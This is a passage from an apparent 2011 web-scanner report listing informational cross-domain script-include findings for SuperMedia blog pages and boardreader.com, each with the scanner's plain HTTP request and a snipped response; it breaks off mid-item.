Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:26 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title> Allowing Employees to Work Remotely Could be a Win-Win for Your Business | SuperMedia Blog |
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.16. http://blog.supermedia.com/2011/01/getting-in-shape-tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/getting-in-shape-tips/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/getting-in-shape-tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>3 Tips For Getting in Shape While Running a Business | SuperMedia Blog | SuperMedia.com</titl
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.17. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/how-to-use-op-ed-pages-to-promote-your-business/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/how-to-use-op-ed-pages-to-promote-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:16 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:16 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How to Use Op-Ed Pages to Promote Your Business | SuperMedia Blog | SuperMedia.com</title>

...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.18. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/starting-a-social-enterprise/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/starting-a-social-enterprise/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:28 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:28 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Starting A Social Enterprise | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.19. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/videos-will-help-your-small-business/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/videos-will-help-your-small-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:17 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:17 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How Videos Will Help Your Small Business | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.20. http://blog.supermedia.com/2011/02/build-brand/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/build-brand/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/build-brand/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Upping Your Brand in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.21. http://blog.supermedia.com/2011/02/go-marketing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/go-marketing/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/go-marketing/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Go Guerrilla with Your Marketing | SuperMedia Blog | SuperMedia.com</title>

<link rel="alt
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.22. http://blog.supermedia.com/2011/02/planning-appreciation-events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/planning-appreciation-events/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/planning-appreciation-events/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Planning Appreciation Events | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.23. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/should-you-loan-money-to-employees/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/should-you-loan-money-to-employees/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Should You Loan Money to Your Employees? | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.24. http://blog.supermedia.com/archives/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:30 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:30 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.25. http://blog.supermedia.com/archives/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/news/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/news/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:31 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:31 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.26. http://blog.supermedia.com/archives/newsletters/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/newsletters/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/newsletters/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:32 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:32 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.27. http://blog.supermedia.com/archives/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/press-releases/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/press-releases/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:33 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:33 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.28. http://blog.supermedia.com/archives/tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/tips/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.29. http://boardreader.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; human_user=true; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:46:37 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 23:46:37 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 7529
Connection: keep-alive
Content-Length: 14347

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.30. http://boardreader.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 15:47:25 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 21:47:25 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 17040
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.31. http://boardreader.com/my.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /my.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.32. http://boardreader.com/my/signup.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my/signup.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /my/signup.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.33. http://boardreader.com/pop/articles/-/-/7.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/articles/-/-/7.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/articles/-/-/7.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.34. http://boardreader.com/pop/domains.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/domains.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/domains.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>Top domains :
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.35. http://boardreader.com/pop/films/-/-/3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/films/-/-/3.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/films/-/-/3.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.36. http://boardreader.com/pop/instructions/-/-/7.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/instructions/-/-/7.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/instructions/-/-/7.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

